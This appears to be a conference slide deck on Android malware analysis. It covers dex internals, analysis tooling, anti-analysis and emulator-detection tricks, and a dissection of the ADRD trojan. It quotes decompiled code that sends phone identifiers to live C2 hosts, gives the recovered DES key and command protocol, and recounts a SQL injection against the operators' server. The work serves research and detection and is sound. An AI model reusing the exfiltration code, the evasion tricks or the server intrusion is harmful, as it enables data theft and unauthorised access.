Lost in translation
WTF is happening inside my Android Phone


Contents

- Android System
- Static Analysis
- Dynamic Analysis
- Reversing
- Red Bunny
- Conclusion


Android architecture

(diagram of the Android software stack; not reproduced in the text)


Dalvik VM

- Register-based virtual machine.
- It uses its own bytecode, not Java bytecode.
- Runs on a slow CPU with little RAM.
- Runs on an operating system without swap space.
- Optimized for memory efficiency.
- Dex class file format.


Dex file format

- header
- string_ids
- type_ids
- proto_ids
- field_ids
- method_ids
- class_defs
- data

The header carries the size and offset of every other section, so any parser (and any tool you are trying to break) reads it first.
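As an added example (not code from the slides), a parser for that header which also verifies the two hashes the header carries. This is the first check to run on a dex you suspect has been patched by hand: dexopt refuses a file whose adler32 does not match, so a patched dex that still runs on Dalvik has had its checksum recomputed, and a patched dex that crashes your tools but not the phone usually has not. The sample dex is constructed inside the block; it is not a real application.

```python
"""Parse a .dex header and verify its checksum and signature.

Added example, not code from the slides. Layout is Dalvik's documented dex
header: 8-byte magic, adler32 checksum (over everything after the checksum
field), SHA-1 signature (over everything after the signature field), then
20 little-endian u4 fields ending in the size/offset pairs of the sections
listed on the slide. The sample file below is constructed here.
"""
import hashlib
import struct
import zlib

DEX_MAGIC = b"dex\n035\0"
HEADER_SIZE = 0x70
ENDIAN_CONSTANT = 0x12345678
# size/offset pairs, in header order
SECTIONS = ("string_ids", "type_ids", "proto_ids", "field_ids",
            "method_ids", "class_defs", "data")


def parse_dex_header(blob):
    """Return the header fields plus checksum_ok / signature_ok / size_ok flags."""
    if len(blob) < HEADER_SIZE:
        raise ValueError("shorter than a dex header")
    if blob[:8] != DEX_MAGIC:
        raise ValueError("bad magic %r" % blob[:8])
    checksum, = struct.unpack_from("<I", blob, 8)
    signature = blob[12:32]
    f = struct.unpack_from("<20I", blob, 32)
    hdr = {"checksum": checksum, "signature": signature.hex(),
           "file_size": f[0], "header_size": f[1], "endian_tag": f[2],
           "link_size": f[3], "link_off": f[4], "map_off": f[5]}
    for i, name in enumerate(SECTIONS):
        hdr[name + "_size"] = f[6 + 2 * i]
        hdr[name + "_off"] = f[7 + 2 * i]
    # dexopt rejects a mismatching adler32; the SHA-1 is what tools use to
    # identify the file. Both must be recomputed after patching bytecode.
    hdr["checksum_ok"] = (zlib.adler32(blob[12:]) & 0xFFFFFFFF) == checksum
    hdr["signature_ok"] = hashlib.sha1(blob[32:]).digest() == signature
    hdr["size_ok"] = (f[0] == len(blob) and f[1] == HEADER_SIZE
                      and f[2] == ENDIAN_CONSTANT)
    return hdr


def fix_dex_hashes(blob):
    """Recompute signature, then checksum (the checksum covers the signature)."""
    b = bytearray(blob)
    b[12:32] = hashlib.sha1(bytes(b[32:])).digest()
    struct.pack_into("<I", b, 8, zlib.adler32(bytes(b[12:])) & 0xFFFFFFFF)
    return bytes(b)


def build_sample_dex():
    """Constructed dex-shaped file: empty id tables and a 16-byte data section."""
    data = b"\0" * 16
    file_size = HEADER_SIZE + len(data)
    fields = [file_size, HEADER_SIZE, ENDIAN_CONSTANT, 0, 0, 0]  # link_*, map_off
    fields += [0, 0] * 6                                          # six empty id/def tables
    fields += [len(data), HEADER_SIZE]                            # data_size, data_off
    body = struct.pack("<20I", *fields) + data
    unsigned = DEX_MAGIC + b"\0" * 4 + b"\0" * 20 + body
    return fix_dex_hashes(unsigned)


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_dex()
    for k, v in parse_dex_header(blob).items():
        print("%-16s %s" % (k, v))
```

Run it with a classes.dex pulled out of an APK; with no argument it parses the constructed sample. A `checksum_ok` of False on a file that installs fine means the runtime you are looking at is not checking, or you are looking at the wrong file.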


Analysis Environment

Tools:

- Case-sensitive file system :D
- Android SDK
- Android NDK
- Android source code
- Eclipse
- Apktool, Dex2jar, JD-GUI
- Android Emulator


Example

.java/source --compiler--> .dex (dexdump)
.dex --dex2jar--> .java (jd-gui)
.dex --baksmali--> .smali


Anti-analysis

Examples:

- Easy: use a.class and A.class as class names: one of the two files will be hidden on case-insensitive file systems.
- Medium: optimize/obfuscate the code with ProGuard.
- Hard: modify the bytecode to break reversing tools (be sure that it still runs on Dalvik).

E.g. androguard-a1: insert the value type VALUE_ANNOTATION, which falls through to the else branch of its encoded-value parser:

    if self.__value_type >= VALUE_SHORT :
        ...
    elif self.__value_type == VALUE_ARRAY :
        ...
    elif self.__value_type == VALUE_BYTE :
        ...
    elif self.__value_type == VALUE_NULL :
        ...
    elif self.__value_type == VALUE_BOOLEAN :
        ...
    else :
        raise("oops")
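The "Easy" trick is cheap to catch before it costs you a file. As an added example (not from the slides), a check that folds the names a dex or an APK will produce on disk and reports any two that collide: Dalvik keeps `La;` and `LA;` apart, but when baksmali, dex2jar or apktool write them out on a case-insensitive disk the second overwrites the first and you never see it. The class list and the APK in the block are constructed, not taken from a real sample.

```python
"""Spot class or file names that collide on a case-insensitive file system.

Added example, not from the slides. Run it over the class list (dexdump,
baksmali) and over the APK's own entries before unpacking anything on a
case-insensitive disk. Sample inputs below are constructed.
"""
import io
import zipfile
from collections import defaultdict


def case_collisions(paths):
    """{folded name: [original names]} for every group of 2+ names that fold to
    the same path. Exact duplicates (two zip entries with one name) show up too."""
    groups = defaultdict(list)
    for p in paths:
        groups[p.lower()].append(p)
    return {k: v for k, v in groups.items() if len(v) > 1}


def smali_path(descriptor):
    """'Lcom/x/A;' -> 'com/x/A.smali', the path baksmali writes for that class."""
    if not (descriptor.startswith("L") and descriptor.endswith(";")):
        raise ValueError("not a class descriptor: %r" % descriptor)
    return descriptor[1:-1] + ".smali"


def collisions_in_classes(descriptors):
    return case_collisions(smali_path(d) for d in descriptors)


def collisions_in_apk(apk_bytes):
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        return case_collisions(zf.namelist())


# --- constructed sample input ---
SAMPLE_CLASSES = ["Lcom/xxx/yyy/MyService;", "Lcom/xxx/yyy/a;",
                  "Lcom/xxx/yyy/A;", "Lcom/xxx/yyy/ddda;"]


def build_sample_apk():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", b"<manifest/>")
        zf.writestr("classes.dex", b"dex\n035\0")
        zf.writestr("assets/Config.bin", b"decoy")
        zf.writestr("assets/config.bin", b"payload")   # hidden on a case-insensitive disk
    return buf.getvalue()


if __name__ == "__main__":
    print(collisions_in_classes(SAMPLE_CLASSES))
    print(collisions_in_apk(build_sample_apk()))
```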


Dynamic Analysis

Basic:

- Create an Android Virtual Device: $android (SDK)
- $emulator -port 5560 @virtual-device -tcpdump capture.pcap
- $adb install app.apk
- $adb shell monkey -v -p package.app 700
- $adb shell logcat -d && adb shell logcat -b events -d (the radio buffer too: -b radio)
- $adb shell '/data/busybox find / -type f -exec /data/busybox md5sum
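The find/md5sum step only pays off as a pair: one listing taken on the clean image and one after monkey has driven the app, diffed with the paths that churn on every boot filtered out. As an added example (not from the slides), the diff over two such listings; both listings, their paths and the placeholder hashes are constructed here, not from a real run.

```python
"""Diff two md5sum listings taken before and after running the sample.

Added example, not from the slides. Both listings below are constructed
(placeholder hashes, paths typical of a 2.x emulator image).
"""
import re

MD5_LINE = re.compile(r"^([0-9a-f]{32})\s+\*?(.+?)\s*$")

# Paths that change on every boot regardless of the app. Assumption: tune for your image.
NOISE = [re.compile(p) for p in (
    r"^/proc/", r"^/sys/", r"^/dev/",
    r"^/data/dalvik-cache/",   # dexopt output; the install itself shows up under /data/app
)]


def parse_md5sum(text):
    """'<md5>  <path>' lines -> {path: md5}; busybox error lines are skipped."""
    result = {}
    for line in text.splitlines():
        m = MD5_LINE.match(line)
        if m:
            result[m.group(2)] = m.group(1)
    return result


def diff_listings(before, after, noise=NOISE):
    """Return added / deleted / modified paths, ignoring anything matching noise."""
    def wanted(path):
        return not any(n.match(path) for n in noise)
    b = {p for p in before if wanted(p)}
    a = {p for p in after if wanted(p)}
    return {
        "added": sorted(a - b),
        "deleted": sorted(b - a),
        "modified": sorted(p for p in a & b if before[p] != after[p]),
    }


# --- constructed listings (placeholder hashes) ---
BEFORE = """\
0123456789abcdef0123456789abcdef  /system/build.prop
11111111111111111111111111111111  /data/system/packages.xml
22222222222222222222222222222222  /proc/version
33333333333333333333333333333333  /data/data/com.android.providers.settings/databases/settings.db
md5sum: /proc/kmsg: Permission denied
"""
AFTER = """\
0123456789abcdef0123456789abcdef  /system/build.prop
55555555555555555555555555555555  /data/system/packages.xml
66666666666666666666666666666666  /proc/version
33333333333333333333333333333333  /data/data/com.android.providers.settings/databases/settings.db
77777777777777777777777777777777  /data/app/com.beautyfullivewallpaper-1.apk
88888888888888888888888888888888  /data/data/com.beautyfullivewallpaper/databases/adrd.db
99999999999999999999999999999999  /data/dalvik-cache/data@app@com.beautyfullivewallpaper-1.apk@classes.dex
"""


def demo():
    return diff_listings(parse_md5sum(BEFORE), parse_md5sum(AFTER))


if __name__ == "__main__":
    for kind, paths in demo().items():
        for p in paths:
            print(kind, p)
```

Feed it the two files you pulled with adb; anything under /data/data/<other package>/ or /system in the "modified" list is what you pull next.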


Make it more real

- Simulate phone events through the emulator console. It listens on the instance's console port (5554 for the first emulator; if you started it with -port 5560, talk to 5560 instead):

Send SMS:

$echo sms send +34656566789 test | nc localhost 5554
D/AT    ( 32): AT< 00200b914356566687f900001120720274404004e3f0380c

Simulate calls:

$echo gsm call +34656566789 | nc localhost 5554
$echo gsm accept +34656566789 | nc localhost 5554
$echo gsm cancel +34656566789 | nc localhost 5554

Change GPS coordinates:

$echo geo fix -82.411629 28.054553 | nc localhost 5554


Dynamic Analysis

Advanced:

- Build your own system image and modify the Java framework classes to log the program flow. Example: frameworks/base/core/java/android/os/Process.java


Compiling Android kernel modules

$git clone git://android.git.kernel.org/kernel/common
$git branch -a
$git checkout --track -b android-goldfish-2.6.29 origin/android-goldfish-2.6.29
$adb pull /proc/config.gz ./; gunzip config.gz; mv config .config

Edit .config and add CONFIG_MODULES=y (disabled by default in the emulator kernel), rebuild, and boot the emulator with the new kernel:

$emulator -avd armv5y -kernel /tmp/zImage

(android.git.kernel.org has since gone away; the goldfish kernel now lives at android.googlesource.com/kernel/goldfish.)


System-call hooking

sys_call_table is not exported to modules on 2.6 kernels, so take its address from the System.map of the kernel you just built:

$grep sys_call_table System.map


Anti-VM

- Detecting the emulator is very easy:

DEVICE_ID:

String id = Settings.Secure.getString(this.getContentResolver(), Settings.Secure.ANDROID_ID);
boolean emulator = TextUtils.isEmpty(id);

Solution: change secure -> android_id in /data/data/com.android.providers.settings/databases/settings.db

IMSI:

TelephonyManager manager = (TelephonyManager) getSystemService(TELEPHONY_SERVICE);
String imsi = manager.getSubscriberId(); // 00000... on the emulator

Solution: patch the emulator binary (search for the +CGSN string) or the emulator source code (external/qemu/telephony/android_modem.c). Note that +CGSN is the AT query for the IMEI (getDeviceId); the IMSI returned by getSubscriberId is served by +CIMI in the same file, so patch both if the sample checks both.
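The ANDROID_ID fix is a one-row edit in a SQLite file. As an added example (not from the slides), a script that does that edit: pull settings.db with adb, run it, push the file back and reboot the emulator, after which `TextUtils.isEmpty(id)` is false. The `secure(_id, name, value)` table definition used to build the throwaway database in the block is an assumption about the stock settings provider layout, and the generated 16-hex-digit value mimics what real devices report.

```python
"""Give the emulator a device-looking ANDROID_ID so TextUtils.isEmpty(id) is false.

Added example, not from the slides. Edits secure -> android_id in a pulled
copy of settings.db. The CREATE TABLE used for the sample DB is an assumption
about the stock provider's schema.
"""
import os
import sqlite3
import tempfile

SETTINGS_DB = "/data/data/com.android.providers.settings/databases/settings.db"


def random_android_id():
    """Real devices report a 64-bit value as 16 lowercase hex digits."""
    return os.urandom(8).hex()


def read_android_id(db_path):
    con = sqlite3.connect(db_path)
    try:
        row = con.execute("SELECT value FROM secure WHERE name = 'android_id'").fetchone()
    finally:
        con.close()
    return row[0] if row else None


def patch_android_id(db_path, new_id=None):
    """Insert or update secure.android_id; returns the value now stored."""
    new_id = new_id or random_android_id()
    con = sqlite3.connect(db_path)
    try:
        present = con.execute("SELECT 1 FROM secure WHERE name = 'android_id'").fetchone()
        if present is None:
            con.execute("INSERT INTO secure (name, value) VALUES ('android_id', ?)", (new_id,))
        else:
            con.execute("UPDATE secure SET value = ? WHERE name = 'android_id'", (new_id,))
        con.commit()
    finally:
        con.close()
    return new_id


def build_sample_settings_db(path):
    """Constructed stand-in for the emulator's settings.db: has adb_enabled, lacks android_id."""
    con = sqlite3.connect(path)
    con.execute("CREATE TABLE secure (_id INTEGER PRIMARY KEY AUTOINCREMENT, "
                "name TEXT UNIQUE ON CONFLICT REPLACE, value TEXT)")
    con.execute("INSERT INTO secure (name, value) VALUES ('adb_enabled', '1')")
    con.commit()
    con.close()


def demo():
    """Build the sample DB in a temp dir and patch it twice (random, then fixed)."""
    path = os.path.join(tempfile.mkdtemp(), "settings.db")
    build_sample_settings_db(path)
    before = read_android_id(path)
    generated = patch_android_id(path)
    after = read_android_id(path)
    forced = patch_android_id(path, "0123456789abcdef")
    return before, generated, after, forced, read_android_id(path)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print("android_id now", patch_android_id(sys.argv[1]))
    else:
        print(demo())
```

Usage: `adb pull <SETTINGS_DB> settings.db; python patch_id.py settings.db; adb push settings.db <SETTINGS_DB>`, then reboot so the settings provider re-reads it. The same table holds adb_enabled, which is one of the "detect ADB stuff" tells on the next slide.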


More Anti-VM

- LocationManager.NETWORK_PROVIDER -> IllegalArgumentException (the emulator has no network location provider)
- Detect ADB stuff: process, network, debug enabled...
- /proc/cpuinfo -> Hardware : Goldfish
- vibrator.vibrate(milliseconds) and use a SensorListener (sensor data doesn't change) (thanks Ehooo)
- QEMU-specific detection (Google)

Solution: patch the emulator, QEMU, system hooking...


Alternatives to the Android Emulator

- http://www.android-x86.org/ (supports VMware)
- Use a real phone... slower


Attack vectors

- Alternative markets, repackaged applications.
- SMS, MMS vulnerabilities. Fuzzing!!!
- Wireless and Bluetooth drivers
- NFC
- System components: WebKit, sound library, kernel.


Third party software

(slide listing the third-party components shipped in Android; not reproduced in the text)

Source: http://android.git.kernel.org/


ADRD aka Redbunny

- "Security Alert 2011-02-14: New Android Trojan 'ADRD' Was Found in the Wild by Aegislab" (http://blog.aegislab.com/index.php?op=ViewArticle&articleId=75&blogId=1)

- "[…] Today, we found a new Android trojan, we call it "ADRD", which was not reported by any security vendors before. […]"

- Jaime Blasco and Pablo Rincón were working together, analyzing this malware on Feb 2, 2011:
  * Name: com.beautyfullivewallpaper
  * Date: Feb. 2, 2011, 1:49 p.m.

- Also known as HongTouTou


Detection

- Permission list:
  * INTERNET, WRITE_EXTERNAL_STORAGE, ACCESS_NETWORK_STATE, READ_PHONE_STATE, RECEIVE_BOOT_COMPLETED, MODIFY_PHONE_STATE, WRITE_APN_SETTINGS...

- Cipher module/library calls (DES):
  * init    Ljavax/crypto/Cipher;    Lcom/xxx/yyy/ddda;    decrypt

- Function calls to retrieve the IMSI/IMEI codes:
  * IMEI: getDeviceId        Lcom/xxx/yyy/MyService;    onCreate
  * IMSI: getSubscriberId    Lcom/xxx/yyy/MyService;    onCreate

- HTTP requests (GET and POST):
  * String str8 = "http://adrd.taxuan.net/index.aspx?im=" + (String)localObject;
  * adrd.xiaxiab.com
  * POST /index.aspx?im=82a68757db94a88dace3e401a5721b33af757f73d68485eab1244e5dace3ed65910991f4dbd438af


Detection

- Sends HTTP requests through a proxy (10.0.0.172:80 is the WAP gateway of the CMWAP and UNIWAP APNs, which is why the service checks for exactly those APNs):
  * HttpHost localHttpHost = new HttpHost("10.0.0.172", 80, "http");
  * HttpParams localHttpParams = localDefaultHttpClient.getParams().setParameter("http.route.default-proxy", localHttpHost);

- Services:
  * com.xxx.yyy.MyService
  * .beauty.Beauty

- Intents:
  * android.intent.action.BOOT_COMPLETED -> starts at system boot
  * android.intent.action.PHONE_STATE
  * android.net.conn.CONNECTIVITY_CHANGE
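The two Detection slides are a rule set waiting to be run. As an added example (not from the slides), a scanner that greps what apktool leaves behind (AndroidManifest.xml plus the smali tree) for the permissions, API calls, proxy address and C2 hosts listed above and sums a weight per hit. The weights are an assumption; the manifest and smali snippets in the block are constructed to resemble the sample and are not taken from it.

```python
"""Score an apktool-unpacked APK against the ADRD indicators on the Detection slides.

Added example, not from the slides. Weights are an assumption; the sample
manifest and smali below are constructed, not from a real APK.
"""
import os
import re

INDICATORS = [
    # (label, regex, weight)
    ("perm:READ_PHONE_STATE",       r"android\.permission\.READ_PHONE_STATE",       1),
    ("perm:RECEIVE_BOOT_COMPLETED", r"android\.permission\.RECEIVE_BOOT_COMPLETED", 1),
    ("perm:MODIFY_PHONE_STATE",     r"android\.permission\.MODIFY_PHONE_STATE",     2),
    ("perm:WRITE_APN_SETTINGS",     r"android\.permission\.WRITE_APN_SETTINGS",     2),
    ("intent:BOOT_COMPLETED",       r"android\.intent\.action\.BOOT_COMPLETED",     1),
    ("api:DES cipher",              r'Ljavax/crypto/Cipher;->getInstance\(|"DES/CBC/PKCS5Padding"', 2),
    ("api:getDeviceId (IMEI)",      r"Landroid/telephony/TelephonyManager;->getDeviceId\(", 1),
    ("api:getSubscriberId (IMSI)",  r"Landroid/telephony/TelephonyManager;->getSubscriberId\(", 1),
    ("net:CMWAP proxy 10.0.0.172",  r'"10\.0\.0\.172"', 2),
    ("net:ADRD C2 host",            r"adrd\.(taxuan\.net|xiaxiab\.com)", 3),
]
COMPILED = [(label, re.compile(rx), w) for label, rx, w in INDICATORS]


def scan_texts(files):
    """files: {relative path: text}. Returns {'score': int, 'hits': {label: [paths]}}."""
    hits = {}
    for path, text in files.items():
        for label, rx, _ in COMPILED:
            if rx.search(text):
                hits.setdefault(label, []).append(path)
    score = sum(w for label, _, w in COMPILED if label in hits)
    return {"score": score, "hits": hits}


def scan_dir(root):
    """Load AndroidManifest.xml and every .smali file under an apktool output dir."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            if n == "AndroidManifest.xml" or n.endswith(".smali"):
                full = os.path.join(dirpath, n)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    files[os.path.relpath(full, root)] = fh.read()
    return scan_texts(files)


# --- constructed stand-in for an unpacked sample ---
SAMPLE = {
    "AndroidManifest.xml": """<manifest package="com.xxx.yyy">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.MODIFY_PHONE_STATE"/>
  <uses-permission android:name="android.permission.WRITE_APN_SETTINGS"/>
  <receiver android:name=".MyReceiver"><intent-filter>
    <action android:name="android.intent.action.BOOT_COMPLETED"/>
  </intent-filter></receiver>
</manifest>""",
    "smali/com/xxx/yyy/ddda.smali": """.class public Lcom/xxx/yyy/ddda;
    const-string v1, "DES/CBC/PKCS5Padding"
    invoke-static {v1}, Ljavax/crypto/Cipher;->getInstance(Ljava/lang/String;)Ljavax/crypto/Cipher;
""",
    "smali/com/xxx/yyy/MyService.smali": """.class public Lcom/xxx/yyy/MyService;
    invoke-virtual {v0}, Landroid/telephony/TelephonyManager;->getDeviceId()Ljava/lang/String;
    invoke-virtual {v0}, Landroid/telephony/TelephonyManager;->getSubscriberId()Ljava/lang/String;
    const-string v2, "http://adrd.taxuan.net/index.aspx?im="
    const-string v3, "10.0.0.172"
""",
}


def demo():
    return scan_texts(SAMPLE)


if __name__ == "__main__":
    import sys
    result = scan_dir(sys.argv[1]) if len(sys.argv) > 1 else demo()
    print("score", result["score"])
    for label, paths in sorted(result["hits"].items()):
        print(" ", label, "<-", ", ".join(paths))
```

Point it at the directory `apktool d sample.apk` produced. The permission and IMEI/IMSI rules fire on plenty of legitimate apps; it is the proxy address and the C2 hosts that carry the weight, and the family-specific regexes are the part you will be updating as new samples arrive.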


Analysis I

1. Service module (MyService):
   - Sets the preferred APN
   - Runs every 12 hours
   - Looks for a specific APN network: "CMWAP" || "UNIWAP"

2. Sets a proxy for GET/POST and specially crafted HTTP headers (UA, MIME types).

3. Cipher data module: public static String encrypt/decrypt
   Cipher localCipher = Cipher.getInstance("DES/CBC/PKCS5Padding");

4. Sends data to adrd.taxuan.net/index.aspx?im=%s:
   + IMEI
   + IMSI
   + Netway (preferred APN)
   + iversion
   + oversion

5. Loop:
   + Decrypt response
   + switch(cmd), it depends on the...
     + 0 Do nothing
     + 1 adad.StartGo()
     + 2 ParseO()
     + 3 UpdateHelper()

6. Command handlers:
   - adad.StartGo(): sends http://adrd.xiaxiab.com/pic.aspx?im=+encrypt(IMEI+IMSI) and parses the big list of URLs/referers (B#1#963a_w1|http://59.173.12.105/g/g.ashx?w=963a_w1). BBBB.Go() retrieves search lists from wap.baidu.com; FixUrls() sends random requests adding BAIDU_WISE_UID and HTTP_HEADERS; then it sends log data to the control servers.
   - ParseO(): parses the server response (number, flags, tags...): T213607170863|12345|+    -10086+    abc   -597|   [   '
   - UpdateHelper: installs the update apk.


Analysis II

- Following the encryption routines, the DES key is found: this.kk = "48734154"; (8 ASCII bytes, i.e. the raw DES key)

* UpdateHelper class:

  public class UpdateHelper
  {
    private static String savefilepath = "/myupdate.apk";
    private Context ct;
    private int netway;

* Benefit: visits to the content (Baidu) and bandwidth consumption (China Mobile and Unicom), and also SMS charges.

- Server URLs (there are more):
  http://adrd.xiaxiab.com/pic.aspx?im=CIPHERED_DATA
  http://adrd.taxuan.net/index.aspx?im=CIPHERED_DATA

- We want to know more!!
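The command loop in Analysis I and the reply strings in Analysis II fit one small decoder. As an added example (not from the slides, and our reading of them), a parser for the decrypted replies that routes them the way the bot's switch(cmd) does: every reply shown starts with 'T' and a command digit (0 do nothing, 1 adad.StartGo(), 2 ParseO(), 3 UpdateHelper()), the rest is the payload. DES/CBC decryption is left out because the slides give the key but not the IV, so feed it decrypted text; splitting the T2 payload on '|' into a number plus trailing fields is our assumption.

```python
"""Decode ADRD's decrypted command replies and route them like the bot's switch.

Added example, not from the slides. Interpretation of the T<digit><payload>
replies the slides show; decryption is out of scope (key known, IV not).
"""
import re

DES_KEY = b"48734154"   # from the slides: 8 ASCII bytes = one DES key

ACTIONS = {
    "0": "noop",
    "1": "StartGo",       # fetch pic.aspx?im=... and the URL/referer list, then hit Baidu
    "2": "ParseO",        # number, flags, tags
    "3": "UpdateHelper",  # download and install myupdate.apk from the given URL
}

REPLY = re.compile(r"^T(-?\d)(.*)$", re.S)


def decode_reply(plaintext):
    """Parse one decrypted reply into {'cmd', 'action', 'payload', ...}."""
    m = REPLY.match(plaintext)
    if not m:
        raise ValueError("not a T-command reply: %r" % plaintext[:20])
    cmd, payload = m.group(1), m.group(2)
    out = {"cmd": cmd, "action": ACTIONS.get(cmd, "unknown"), "payload": payload}
    if cmd == "2":
        parts = payload.split("|")          # assumption: '|' separates number, flags, tags
        out["number"] = parts[0].strip()
        out["fields"] = [p.strip() for p in parts[1:]]
    elif cmd == "3":
        out["update_url"] = payload.strip()
    return out


def dispatch(plaintext, handlers):
    """Mirror of the bot's switch(cmd): call handlers[action](reply), return its result."""
    reply = decode_reply(plaintext)
    handler = handlers.get(reply["action"])
    return handler(reply) if handler else None


# --- constructed run over the exact strings the slides show ---
SAMPLE_REPLIES = [
    "T013607170863",
    "T3http://adrd.xiaxiab.com/down.aspx",
    "T213607170863|12345|+        -10086+     abc     -597|     [     '",
]


def demo():
    log = []
    handlers = {
        "noop": lambda r: log.append("sleep"),
        "ParseO": lambda r: log.append(
            "ParseO number=%s fields=%d" % (r["number"], len(r["fields"]))),
        "UpdateHelper": lambda r: log.append(
            "download %s -> /myupdate.apk" % r["update_url"]),
    }
    for reply in SAMPLE_REPLIES:
        dispatch(reply, handlers)
    return log


if __name__ == "__main__":
    for line in demo():
        print(line)
```

With the key recovered and a DES implementation (the next slide uses pyDes), the same handlers can be pointed at live replies; keep the handlers as logging stubs as above rather than re-implementing StartGo, since that would generate the Baidu traffic the operators are paid for.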


Control Servers

- adrd.xiaxiab.com from a bird's-eye view:
  * Microsoft-IIS/6.0
  * Debug enabled (displaying .NET errors and backtraces)
  * Hidden paths to the .NET/aspx application
  * ALL is Chinese! (WTF!?!"·$%&/(?)

- Possible attack vectors:
  * HTTP functions + DES key + pyDes = "legal" HTTP requests (at least for the adrd server)


Control Servers

- First results:
  * Exceptions in Chinese. Google Translate is your friend
  * Errors in .NET (it didn't generate any HTML list/table or view to use for displaying data)
  * We got a successful SQL injection after the last ciphered parameter :D
  * User without admin privileges.
  * Permissions to run backups + shared resources = timeout
  * Other possibilities:
    + 1: Create a temporary DB with just one table each time, dump paginated rows and run backups. Problem: complex to do and complex to rebuild the original DB (the language didn't help either)
    + 2: Try to get a shell in any possible way. Problem: time, exploits, noise (our current attacks were hidden by DES in the HTTP logs, and it's not usual to log all the DB queries for performance reasons).


Database Information

- The whole schema obtained: list of tables, fields, types, stored procedures

- IMEI/IMSI list (at least some of them), logs, keywords, Baidu accounts

- The main stored procedure affected by the SQL injection retrieves the URL of myupdate.apk, which points to adrd.xiaxiab.com/down.aspx!
  * Parameters:
    @imei varchar(50), @imsi varchar(50), @ip varchar(128), @logs varchar(256), @netwap int
  * Stored procedure:
    --if (@netwap=2)
    select 'T-1|T11'
    --select 'T3http://adrd.xiaxiab.com/down.aspx'
    --select 'T213607170863|12345|+        -10086+     abc     -597|     [     '
    --else
    --select 'T013607170863'

- Looks like they were considering the netwap (based on the mobile operator) as a criterion for sending commands
  * TX (where X seems to be a command type)
  * 13607170863 is a phone number located in Wuhan


Database Scheme

(two-column slide; table names shown as t_… were unreadable in the slide text)

t_baiduHourPercent: autoid, mHour, mPercent
t_baidukeyword: keyword, viewcount
t_baidukeywordflash: keyword
t_baiduOrtherKey: keyword, viewcount
t_baidupwd: id, way, username, pwd
t_baiduwayname: way, wayname
t_keywordResult: id, keyword, link, head, flag
t_androidtemplog: id, imsi, way, result, createtime
t_keywordResult20100601: id, keyword, link, head, flag
t_keywordResult20101108: id, keyword, link, head, flag
t_baiduHourPercent20101012: autoid, mHour, mPercent
t_androidtemplog_backup: id, imsi, way, result, createtime
t_androidtemperrlog: id, compresslog, decompresslog, createtime
t_androidtemplog_backup201101: id, imsi, way, result, createtime
t_android…: id, imei, imsi, logs, ip, createtime, netway
t_android…: …, …, …, …, createtime
t_baidutask: maxmdncount, mdncount, percent, f3percent, createtime, userid
t_…: way, maxClick, minClick, leaveTotalClick, leaveEffectClick
t_…_wap_20100323: keyword, createtime
t_…_wap_20100722: keyword, createtime

t_…: myear, mmonth, mday, mhour, total
t_…: way, flag
t_…: keyword, flag
t_…_wap: keyword, flag
t_…_wap_back: keyword, flag
t_…_wap_back: keyword, flag
t_…: flag
t_…: keyword, createtime
t_…_wap: keyword, createtime
t_…: keyword, createtime
t_…_wap: keyword, createtime


Myupdate.apk

- It uses the main package of the ADRD family, xxx.yyy.

- The update has other permissions: WRITE_SMS, READ_SMS, RECEIVE_SMS, SEND_SMS...

- Looks like a Google Reader

- It adds a local SQLite DB (keyword storage):
  go_g1_sms: id, keyword, type, flag
  go_g2_sms: id, keyword, keyword2

- SMSObserver:
  * Replaces keywords in SMSs.
  * Sends SMS!


Samples

Package name                              Md5                               Adrd Ver        IVer
com.beautyfullivewallpaper                4556a687a2845bf4dfac62c594938cf3  adrd.zt.cw.1    6
com.yodesoft.yohandcar                    6783cee889fa64df68af58a56ff6e362  adrd.zt.2       6
com.binaryloft.live.winter                aa5216da617839e818d83d8185da42b0  adrd.zt.jtj.2   6
com.magicwach.rdefense                    839c37f3a2c8d31561d28f619a2a712e  adrd.zt.cw.3    6
com.tat.livewallpaper.dandelion           5192ad05597e7a148f642be43f6441f6  adrd.zt.cw.4    6
com.classicnerds.livewallpaper.HK         b72724d8fc0f633194dcc3bd28eec026  adrd.zt.cw.5    7
fishnoodle.night_city                     a01ba26a34e55f71873782348ff5e074  adrd.zt.dxm.6   7
com.appspot.swisscodemonkeys.steam        cdfca19bf212adf3292e4fe677fe46a6  adrd.zt.cw.7    7
kr.mobilesoft.yxplayer                    e3cc6c7af0d83fe322116254c01cf720  adrd.zt.cw.8    7
com.labgency.wallpapers.waves             7d764347a0b0c9d11160d7a7684bf02b  adrd.zt.dxm.8   7
com.laucass.andromax                      627f41c8f8e7ab007641c4a0c1d8ce1b  adrd.zt.cw.9    7
com.digitalchocolate.androidrollergapp    71c0a67daa544450d7c620a48cc059b0  drd.zt.cw.12    7
proscio.wallpaper.shamroc                 e09782d35d72a769dc7454adb6d8e2e9  adrd.zt.cw.15   7
com.tt.yy                                 f2596f8f3c52381318f62d1ab161c284  ??              ??


Infections

(map: geolocation of infections; not reproduced in the text)

Infections by operator

(chart: infections by operator; not reproduced in the text)

+20K different IMSIs

Other affected operators:
- Far EasTone
- Peoples Telephone Company
- Hutchison 3G
- PCCW Mobile Sunday
- Hong Kong Telecom
- SmarTone Mobile


Thank You

Questions?

@jaimeblascob
@PabloForThePPL
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...RootedCON
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRootedCON
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRootedCON
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRootedCON
 
